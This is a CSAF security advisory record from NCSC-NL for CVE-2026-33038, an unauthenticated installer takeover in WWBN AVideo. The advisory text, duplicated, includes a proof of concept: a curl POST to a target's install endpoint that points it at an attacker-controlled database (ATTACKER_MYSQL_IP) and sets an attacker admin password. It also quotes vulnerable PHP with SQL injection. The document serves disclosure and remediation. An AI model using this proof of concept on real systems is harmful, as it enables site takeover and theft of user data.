{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability to use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-33038",
        "tracking": {
            "current_release_date": "2026-03-26T06:11:44.970155Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-33038",
            "initial_release_date": "2026-03-17T21:00:14.085511Z",
            "revision_history": [
                {
                    "date": "2026-03-17T21:00:14.085511Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-17T21:00:17.619104Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-19T11:40:23.995215Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-20T18:25:33.259671Z",
                    "number": "4",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-20T18:25:40.789373Z",
                    "number": "5",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-20T18:29:25.114576Z",
                    "number": "6",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-20T18:29:28.411631Z",
                    "number": "7",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-20T18:39:05.989719Z",
                    "number": "8",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-20T21:41:43.565730Z",
                    "number": "9",
                    "summary": "References created (1)."
                },
                {
                    "date": "2026-03-20T21:59:11.704062Z",
                    "number": "10",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-20T21:59:15.323097Z",
                    "number": "11",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-21T13:47:28.434173Z",
                    "number": "12",
                    "summary": "References removed (1)."
                },
                {
                    "date": "2026-03-22T00:51:54.783392Z",
                    "number": "13",
                    "summary": "References created (1)."
                },
                {
                    "date": "2026-03-22T11:24:56.848162Z",
                    "number": "14",
                    "summary": "References removed (1)."
                },
                {
                    "date": "2026-03-23T00:54:05.568695Z",
                    "number": "15",
                    "summary": "References created (1)."
                },
                {
                    "date": "2026-03-23T05:16:01.988335Z",
                    "number": "16",
                    "summary": "References removed (1)."
                },
                {
                    "date": "2026-03-24T02:12:04.237709Z",
                    "number": "17",
                    "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-24T02:12:06.221510Z",
                    "number": "18",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-24T20:56:28.910268Z",
                    "number": "19",
                    "summary": "References created (1)."
                },
                {
                    "date": "2026-03-24T20:56:31.891095Z",
                    "number": "20",
                    "summary": "NCSC Score updated."
                }
            ],
            "status": "interim",
            "version": "20"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<26.0",
                                "product": {
                                    "name": "vers:unknown/<26.0",
                                    "product_id": "CSAFPID-5874460",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "AVideo"
                    }
                ],
                "category": "vendor",
                "name": "WWBN"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-33038",
            "cwe": {
                "id": "CWE-306",
                "name": "Missing Authentication for Critical Function"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "## Summary\nThe `install/checkConfiguration.php` endpoint performs full application initialization — database setup, admin account creation, and configuration file write — from unauthenticated POST input. The only guard is checking whether `videos/configuration.php` already exists. On uninitialized deployments, any remote attacker can complete the installation with attacker-controlled credentials and an attacker-controlled database, gaining full administrative access.\n\n## Affected Component\n- `install/checkConfiguration.php` — entire file (lines 1-273)\n\n## Description\n\n### No authentication or access restriction on installer endpoint\n\nThe `checkConfiguration.php` file performs the most privileged operations in the application — creating the database schema, the admin account, and the configuration file — with no authentication, no setup token, no CSRF protection, and no IP restriction. The sole guard is a file-existence check:\n\n```php\n// install/checkConfiguration.php — lines 2-5\nif (file_exists(\"../videos/configuration.php\")) {\n    error_log(\"Can not create configuration again: \".  json_encode($_SERVER));\n    exit;\n}\n```\n\nIf `videos/configuration.php` does not exist (fresh deployment, container restart without persistent storage, re-deployment), the entire installer runs with attacker-controlled POST parameters.\n\n### Attacker-controlled database host eliminates credential guessing\n\nUnlike typical installer exposure vulnerabilities where the attacker must guess the target's database credentials, this endpoint allows the attacker to supply their own database host:\n\n```php\n// install/checkConfiguration.php — line 25\n$mysqli = @new mysqli($_POST['databaseHost'], $_POST['databaseUser'], $_POST['databasePass'], \"\", $_POST['databasePort']);\n```\n\nThe attacker can:\n1. Run their own MySQL server with the AVideo schema pre-loaded\n2. Set `databaseHost` to their server's IP\n3. 
The connection succeeds (attacker controls the DB)\n4. The configuration file is written pointing the application at the attacker's database permanently\n\n### Admin account creation with unsanitized input\n\nThe admin user is created with direct POST parameter concatenation into SQL:\n\n```php\n// install/checkConfiguration.php — line 120\n$sql = \"INSERT INTO users (id, user, email, password, created, modified, isAdmin) VALUES (1, 'admin', '\"\n     . $_POST['contactEmail'] . \"', '\" . md5($_POST['systemAdminPass']) . \"', now(), now(), true)\";\n```\n\nThis has two issues: (1) the attacker controls the admin password, and (2) `$_POST['contactEmail']` is directly concatenated into SQL without escaping (SQL injection).\n\n### Configuration file written with attacker-controlled values\n\nThe configuration file is written to disk with all attacker-supplied values embedded:\n\n```php\n// install/checkConfiguration.php — lines 238-247\n$videosDir = $_POST['systemRootPath'].'videos/';\n\nif(!is_dir($videosDir)){\n    mkdir($videosDir, 0777, true);\n}\n\n$fp = fopen(\"{$videosDir}configuration.php\", \"wb\");\nfwrite($fp, $content);\nfclose($fp);\n```\n\nThe `$content` variable (built at lines 188-236) embeds `$_POST['databaseHost']`, `$_POST['databaseUser']`, `$_POST['databasePass']`, `$_POST['webSiteRootURL']`, `$_POST['systemRootPath']`, and `$_POST['salt']` directly into the PHP configuration file.\n\n### Inconsistent defense: CLI installer is protected, web endpoint is not\n\nThe CLI installer (`install/install.php`) properly restricts access:\n\n```php\n// install/install.php — lines 3-5\nif (!isCommandLineInterface()) {\n    die('Command Line only');\n}\n```\n\nThe web endpoint (`checkConfiguration.php`) lacks any equivalent protection, creating an inconsistent defense pattern.\n\n### No web server protection on install directory\n\nThere is no `.htaccess` file in the `install/` directory. The root `.htaccess` does not block access to `install/`. 
The endpoint is directly accessible at `/install/checkConfiguration.php`.\n\n### Execution chain\n\n1. Attacker discovers an AVideo instance where `videos/configuration.php` does not exist (fresh or re-deployed)\n2. Attacker sends POST to `/install/checkConfiguration.php` with their own database host, admin password, and site configuration\n3. The script connects to the attacker's database (or the target's with guessed/default credentials)\n4. Tables are created, admin user is inserted with attacker's password\n5. `configuration.php` is written to disk, permanently configuring the application\n6. Attacker logs in as admin with full control over the application\n\n## Proof of Concept\n\n**Step 1:** Set up an attacker-controlled MySQL server with the AVideo schema:\n\n```bash\n# On attacker's server\nmysql -e \"CREATE DATABASE avideo;\"\nmysql avideo < database.sql  # Use AVideo's own schema file\n```\n\n**Step 2:** Send the installation request to the target:\n\n```bash\ncurl -s -X POST https://TARGET/install/checkConfiguration.php \\\n  -d 'systemRootPath=/var/www/html/AVideo/' \\\n  -d 'databaseHost=ATTACKER_MYSQL_IP' \\\n  -d 'databasePort=3306' \\\n  -d 'databaseUser=attacker' \\\n  -d 'databasePass=attacker_pass' \\\n  -d 'databaseName=avideo' \\\n  -d 'createTables=1' \\\n  -d 'contactEmail=attacker@example.com' \\\n  -d 'systemAdminPass=AttackerPass123!' \\\n  -d 'webSiteTitle=Pwned' \\\n  -d 'mainLanguage=en_US' \\\n  -d 'webSiteRootURL=https://TARGET/'\n```\n\n**Step 3:** Log in as admin:\n\n```\nUsername: admin\nPassword: AttackerPass123!\n```\n\nThe attacker now has full administrative access. 
If using their own database, they control all application data.\n\n## Impact\n\n- **Full application takeover:** Attacker becomes the sole admin with complete control\n- **Persistent backdoor via configuration:** The `videos/configuration.php` file is written with attacker-controlled database credentials, ensuring persistent access even after the attack\n- **Data exfiltration:** If pointing to the attacker's database, all future user data (registrations, uploads, comments) flows to the attacker\n- **Remote code execution potential:** Admin access in AVideo enables file uploads and plugin management, which can lead to arbitrary PHP execution\n- **SQL injection bonus:** `$_POST['contactEmail']` on line 120 is directly concatenated into SQL, allowing additional database manipulation\n\n## Recommended Remediation\n\n### Option 1: Add a one-time setup token (preferred)\n\nGenerate a random setup token during deployment that must be provided to complete installation:\n\n```php\n// At the top of install/checkConfiguration.php, after the file_exists check:\n\n// Require a setup token that was generated during deployment\n$setupTokenFile = __DIR__ . '/../videos/.setup_token';\nif (!file_exists($setupTokenFile)) {\n    $obj = new stdClass();\n    $obj->error = \"Setup token file not found. 
Create videos/.setup_token with a random secret.\";\n    header('Content-Type: application/json');\n    echo json_encode($obj);\n    exit;\n}\n\n$expectedToken = trim(file_get_contents($setupTokenFile));\nif (empty($_POST['setupToken']) || !hash_equals($expectedToken, $_POST['setupToken'])) {\n    $obj = new stdClass();\n    $obj->error = \"Invalid setup token.\";\n    header('Content-Type: application/json');\n    echo json_encode($obj);\n    exit;\n}\n```\n\n### Option 2: Restrict installer to localhost/CLI only\n\nBlock web access to the installer entirely:\n\n```php\n// At the top of install/checkConfiguration.php, after the file_exists check:\nif (!isCommandLineInterface()) {\n    $allowedIPs = ['127.0.0.1', '::1'];\n    if (!in_array($_SERVER['REMOTE_ADDR'], $allowedIPs)) {\n        header('Content-Type: application/json');\n        echo json_encode(['error' => 'Installation is only allowed from localhost']);\n        exit;\n    }\n}\n```\n\nAdditionally, add an `.htaccess` file in the `install/` directory:\n\n```apache\n# install/.htaccess\n<Files \"checkConfiguration.php\">\n    Require local\n</Files>\n```\n\n### Additional fixes needed\n\n1. **Parameterize SQL queries** on line 120 to prevent SQL injection:\n```php\n$stmt = $mysqli->prepare(\"INSERT INTO users (id, user, email, password, created, modified, isAdmin) VALUES (1, 'admin', ?, ?, now(), now(), true)\");\n$hashedPass = md5($_POST['systemAdminPass']); // Also: upgrade from md5 to password_hash()\n$stmt->bind_param(\"ss\", $_POST['contactEmail'], $hashedPass);\n$stmt->execute();\n```\n\n2. **Upgrade password hashing** from `md5()` to `password_hash()` with `PASSWORD_BCRYPT` or `PASSWORD_ARGON2ID`.\n\n## Credit\nThis vulnerability was discovered and reported by [bugbunny.ai](https://bugbunny.ai).",
                    "title": "github - https://github.com/advisories/GHSA-2f9h-23f7-8gcx"
                },
                {
                    "category": "description",
                    "text": "## Summary\nThe `install/checkConfiguration.php` endpoint performs full application initialization — database setup, admin account creation, and configuration file write — from unauthenticated POST input. The only guard is checking whether `videos/configuration.php` already exists. On uninitialized deployments, any remote attacker can complete the installation with attacker-controlled credentials and an attacker-controlled database, gaining full administrative access.\n\n## Affected Component\n- `install/checkConfiguration.php` — entire file (lines 1-273)\n\n## Description\n\n### No authentication or access restriction on installer endpoint\n\nThe `checkConfiguration.php` file performs the most privileged operations in the application — creating the database schema, the admin account, and the configuration file — with no authentication, no setup token, no CSRF protection, and no IP restriction. The sole guard is a file-existence check:\n\n```php\n// install/checkConfiguration.php — lines 2-5\nif (file_exists(\"../videos/configuration.php\")) {\n    error_log(\"Can not create configuration again: \".  json_encode($_SERVER));\n    exit;\n}\n```\n\nIf `videos/configuration.php` does not exist (fresh deployment, container restart without persistent storage, re-deployment), the entire installer runs with attacker-controlled POST parameters.\n\n### Attacker-controlled database host eliminates credential guessing\n\nUnlike typical installer exposure vulnerabilities where the attacker must guess the target's database credentials, this endpoint allows the attacker to supply their own database host:\n\n```php\n// install/checkConfiguration.php — line 25\n$mysqli = @new mysqli($_POST['databaseHost'], $_POST['databaseUser'], $_POST['databasePass'], \"\", $_POST['databasePort']);\n```\n\nThe attacker can:\n1. Run their own MySQL server with the AVideo schema pre-loaded\n2. Set `databaseHost` to their server's IP\n3. 
The connection succeeds (attacker controls the DB)\n4. The configuration file is written pointing the application at the attacker's database permanently\n\n### Admin account creation with unsanitized input\n\nThe admin user is created with direct POST parameter concatenation into SQL:\n\n```php\n// install/checkConfiguration.php — line 120\n$sql = \"INSERT INTO users (id, user, email, password, created, modified, isAdmin) VALUES (1, 'admin', '\"\n     . $_POST['contactEmail'] . \"', '\" . md5($_POST['systemAdminPass']) . \"', now(), now(), true)\";\n```\n\nThis has two issues: (1) the attacker controls the admin password, and (2) `$_POST['contactEmail']` is directly concatenated into SQL without escaping (SQL injection).\n\n### Configuration file written with attacker-controlled values\n\nThe configuration file is written to disk with all attacker-supplied values embedded:\n\n```php\n// install/checkConfiguration.php — lines 238-247\n$videosDir = $_POST['systemRootPath'].'videos/';\n\nif(!is_dir($videosDir)){\n    mkdir($videosDir, 0777, true);\n}\n\n$fp = fopen(\"{$videosDir}configuration.php\", \"wb\");\nfwrite($fp, $content);\nfclose($fp);\n```\n\nThe `$content` variable (built at lines 188-236) embeds `$_POST['databaseHost']`, `$_POST['databaseUser']`, `$_POST['databasePass']`, `$_POST['webSiteRootURL']`, `$_POST['systemRootPath']`, and `$_POST['salt']` directly into the PHP configuration file.\n\n### Inconsistent defense: CLI installer is protected, web endpoint is not\n\nThe CLI installer (`install/install.php`) properly restricts access:\n\n```php\n// install/install.php — lines 3-5\nif (!isCommandLineInterface()) {\n    die('Command Line only');\n}\n```\n\nThe web endpoint (`checkConfiguration.php`) lacks any equivalent protection, creating an inconsistent defense pattern.\n\n### No web server protection on install directory\n\nThere is no `.htaccess` file in the `install/` directory. The root `.htaccess` does not block access to `install/`. 
The endpoint is directly accessible at `/install/checkConfiguration.php`.\n\n### Execution chain\n\n1. Attacker discovers an AVideo instance where `videos/configuration.php` does not exist (fresh or re-deployed)\n2. Attacker sends POST to `/install/checkConfiguration.php` with their own database host, admin password, and site configuration\n3. The script connects to the attacker's database (or the target's with guessed/default credentials)\n4. Tables are created, admin user is inserted with attacker's password\n5. `configuration.php` is written to disk, permanently configuring the application\n6. Attacker logs in as admin with full control over the application\n\n## Proof of Concept\n\n**Step 1:** Set up an attacker-controlled MySQL server with the AVideo schema:\n\n```bash\n# On attacker's server\nmysql -e \"CREATE DATABASE avideo;\"\nmysql avideo < database.sql  # Use AVideo's own schema file\n```\n\n**Step 2:** Send the installation request to the target:\n\n```bash\ncurl -s -X POST https://TARGET/install/checkConfiguration.php \\\n  -d 'systemRootPath=/var/www/html/AVideo/' \\\n  -d 'databaseHost=ATTACKER_MYSQL_IP' \\\n  -d 'databasePort=3306' \\\n  -d 'databaseUser=attacker' \\\n  -d 'databasePass=attacker_pass' \\\n  -d 'databaseName=avideo' \\\n  -d 'createTables=1' \\\n  -d 'contactEmail=attacker@example.com' \\\n  -d 'systemAdminPass=AttackerPass123!' \\\n  -d 'webSiteTitle=Pwned' \\\n  -d 'mainLanguage=en_US' \\\n  -d 'webSiteRootURL=https://TARGET/'\n```\n\n**Step 3:** Log in as admin:\n\n```\nUsername: admin\nPassword: AttackerPass123!\n```\n\nThe attacker now has full administrative access. 
If using their own database, they control all application data.\n\n## Impact\n\n- **Full application takeover:** Attacker becomes the sole admin with complete control\n- **Persistent backdoor via configuration:** The `videos/configuration.php` file is written with attacker-controlled database credentials, ensuring persistent access even after the attack\n- **Data exfiltration:** If pointing to the attacker's database, all future user data (registrations, uploads, comments) flows to the attacker\n- **Remote code execution potential:** Admin access in AVideo enables file uploads and plugin management, which can lead to arbitrary PHP execution\n- **SQL injection bonus:** `$_POST['contactEmail']` on line 120 is directly concatenated into SQL, allowing additional database manipulation\n\n## Recommended Remediation\n\n### Option 1: Add a one-time setup token (preferred)\n\nGenerate a random setup token during deployment that must be provided to complete installation:\n\n```php\n// At the top of install/checkConfiguration.php, after the file_exists check:\n\n// Require a setup token that was generated during deployment\n$setupTokenFile = __DIR__ . '/../videos/.setup_token';\nif (!file_exists($setupTokenFile)) {\n    $obj = new stdClass();\n    $obj->error = \"Setup token file not found. 
Create videos/.setup_token with a random secret.\";\n    header('Content-Type: application/json');\n    echo json_encode($obj);\n    exit;\n}\n\n$expectedToken = trim(file_get_contents($setupTokenFile));\nif (empty($_POST['setupToken']) || !hash_equals($expectedToken, $_POST['setupToken'])) {\n    $obj = new stdClass();\n    $obj->error = \"Invalid setup token.\";\n    header('Content-Type: application/json');\n    echo json_encode($obj);\n    exit;\n}\n```\n\n### Option 2: Restrict installer to localhost/CLI only\n\nBlock web access to the installer entirely:\n\n```php\n// At the top of install/checkConfiguration.php, after the file_exists check:\nif (!isCommandLineInterface()) {\n    $allowedIPs = ['127.0.0.1', '::1'];\n    if (!in_array($_SERVER['REMOTE_ADDR'], $allowedIPs)) {\n        header('Content-Type: application/json');\n        echo json_encode(['error' => 'Installation is only allowed from localhost']);\n        exit;\n    }\n}\n```\n\nAdditionally, add an `.htaccess` file in the `install/` directory:\n\n```apache\n# install/.htaccess\n<Files \"checkConfiguration.php\">\n    Require local\n</Files>\n```\n\n### Additional fixes needed\n\n1. **Parameterize SQL queries** on line 120 to prevent SQL injection:\n```php\n$stmt = $mysqli->prepare(\"INSERT INTO users (id, user, email, password, created, modified, isAdmin) VALUES (1, 'admin', ?, ?, now(), now(), true)\");\n$hashedPass = md5($_POST['systemAdminPass']); // Also: upgrade from md5 to password_hash()\n$stmt->bind_param(\"ss\", $_POST['contactEmail'], $hashedPass);\n$stmt->execute();\n```\n\n2. **Upgrade password hashing** from `md5()` to `password_hash()` with `PASSWORD_BCRYPT` or `PASSWORD_ARGON2ID`.\n\n## Credit\nThis vulnerability was discovered and reported by [bugbunny.ai](https://bugbunny.ai).",
                    "title": "github - https://api.github.com/advisories/GHSA-2f9h-23f7-8gcx"
                },
                {
                    "category": "description",
                    "text": "WWBN AVideo is an open source video platform. Versions 25.0 and below are vulnerable to unauthenticated application takeover through the install/checkConfiguration.php endpoint. install/checkConfiguration.php performs full application initialization: database setup, admin account creation, and configuration file write, all from an unauthenticated POST input. The only guard is checking whether videos/configuration.php already exists. On uninitialized deployments, any remote attacker can complete the installation with attacker-controlled credentials and an attacker-controlled database, gaining full administrative access. This issue has been fixed in version 26.0.",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33038.json"
                },
                {
                    "category": "description",
                    "text": "WWBN AVideo is an open source video platform. Versions 25.0 and below are vulnerable to unauthenticated application takeover through the install/checkConfiguration.php endpoint. install/checkConfiguration.php performs full application initialization: database setup, admin account creation, and configuration file write, all from an unauthenticated POST input. The only guard is checking whether videos/configuration.php already exists. On uninitialized deployments, any remote attacker can complete the installation with attacker-controlled credentials and an attacker-controlled database, gaining full administrative access. This issue has been fixed in version 26.0.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33038"
                },
                {
                    "category": "other",
                    "text": "0.0011",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "3.5",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "The value of the most recent EPSS score, Is related to (a version of) an uncommon product, There is exploit data available from source Nvd",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5874460"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://github.com/advisories/GHSA-2f9h-23f7-8gcx"
                },
                {
                    "category": "external",
                    "summary": "Source raw - github",
                    "url": "https://api.github.com/advisories/GHSA-2f9h-23f7-8gcx"
                },
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-2f9h-23f7-8gcx"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33038.json"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33038"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd",
                    "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-2f9h-23f7-8gcx"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd",
                    "url": "https://github.com/WWBN/AVideo/commit/b3fa7869dcb935c8ab5c001a88dc29d2f92cf8e1"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-2f9h-23f7-8gcx"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33038"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
                        "baseScore": 8.1,
                        "baseSeverity": "HIGH"
                    },
                    "products": [
                        "CSAFPID-5874460"
                    ]
                }
            ],
            "title": "CVE-2026-33038"
        }
    ]
}